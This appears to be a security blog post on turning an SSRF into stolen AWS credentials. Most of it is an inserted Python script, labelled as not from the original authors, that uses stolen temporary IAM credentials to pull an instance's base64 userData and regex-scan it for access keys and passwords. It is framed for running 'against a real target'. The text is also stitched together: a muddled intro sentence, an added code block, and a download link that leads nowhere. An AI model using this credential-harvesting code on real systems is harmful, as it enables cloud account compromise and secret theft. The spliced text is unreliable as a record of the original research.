When a web application SSRF causes the cloud to rain credentials & more

The following blog post was written by me and Daniele Costa:


In this blog post we demonstrated an SSRF exploitation to steal AWS credentials and use them to access Amazon S3. What made this attack special was the fact that it was not accessible to our users during the exploitation. Therefore, we had to use the 'userData' attribute of the EC2 describe-instance-attribute operation to extract the sensitive data.
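The userData step is easy to get wrong in practice: DescribeInstanceAttribute returns the user data base64-encoded, and the interesting material (bootstrap scripts exporting keys, passwords written to config files) has to be dug out of the decoded text. The following is an added example, not code from the original post or its authors. It assumes the SSRF yielded an IAM role's temporary credentials in the shape the instance metadata service returns them (AccessKeyId, SecretAccessKey, Token), that this role is allowed to call ec2:DescribeInstanceAttribute, and that the target instance ID is known; the instance ID, the user-data script and the secrets in it are constructed sample values (the access key is the example key from the AWS documentation, not a real one).

```python
import base64
import re

# Constructed sample of what describe-instance-attribute returns for
# Attribute='userData': the Value is base64 of a typical bootstrap script
# that leaks credentials. Instance id and secrets are made up; the access
# key / secret key pair is AWS's own documentation example, not a real key.
SAMPLE_USER_DATA_SCRIPT = """#!/bin/bash
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws s3 sync s3://example-backups /srv/backups
echo "DB_PASSWORD=hunter2" >> /etc/app.env
"""

SAMPLE_RESPONSE = {
    "InstanceId": "i-0123456789abcdef0",  # hypothetical instance id
    "UserData": {
        "Value": base64.b64encode(SAMPLE_USER_DATA_SCRIPT.encode()).decode()
    },
}


def decode_user_data(response):
    """Return the plaintext user data from a DescribeInstanceAttribute response.

    The API hands it back base64-encoded; an instance that was launched without
    user data has no 'Value' key at all, so that case yields an empty string.
    """
    value = response.get("UserData", {}).get("Value")
    if not value:
        return ""
    return base64.b64decode(value).decode("utf-8", errors="replace")


# Patterns for the kinds of secrets that commonly end up in user data.
# AWS access key ids are 20 chars starting with AKIA (long-term) or ASIA
# (temporary); secret keys are 40 chars of base64-like text.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws_secret_access_key\s*[=:]\s*([A-Za-z0-9/+]{40})"),
    "password_assignment": re.compile(
        r"(?i)\b[A-Z_]*PASS(?:WORD)?\b\s*[=:]\s*['\"]?([^\s'\"]+)"),
}


def find_secrets(text):
    """Scan decoded user data and return (kind, value) pairs for each hit."""
    findings = []
    for kind, pattern in SECRET_PATTERNS.items():
        for match in pattern.finditer(text):
            # patterns with a capture group report the captured secret,
            # patterns without one report the whole match
            findings.append((kind, match.group(match.lastindex or 0)))
    return findings


def fetch_user_data(instance_id, creds, region="us-east-1"):
    """Call DescribeInstanceAttribute with credentials taken from the
    metadata service (keys AccessKeyId, SecretAccessKey, Token).

    Needs boto3 and network access, so it is not exercised offline; boto3 is
    imported lazily so the decoding helpers above still work without it.
    """
    import boto3
    ec2 = boto3.client(
        "ec2",
        region_name=region,
        aws_access_key_id=creds["AccessKeyId"],
        aws_secret_access_key=creds["SecretAccessKey"],
        aws_session_token=creds.get("Token"),
    )
    resp = ec2.describe_instance_attribute(
        InstanceId=instance_id, Attribute="userData")
    return decode_user_data(resp)


if __name__ == "__main__":
    # Offline demonstration on the constructed response.
    plaintext = decode_user_data(SAMPLE_RESPONSE)
    for kind, value in find_secrets(plaintext):
        print(f"{kind}: {value}")
```

When running this against a real target, decode_user_data is the function to keep even if the regexes are swapped for a proper secret scanner: without the base64 step, the userData value looks like noise and the leak is easy to miss.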

The unofficial PDF version of this blog post can be downloaded from here: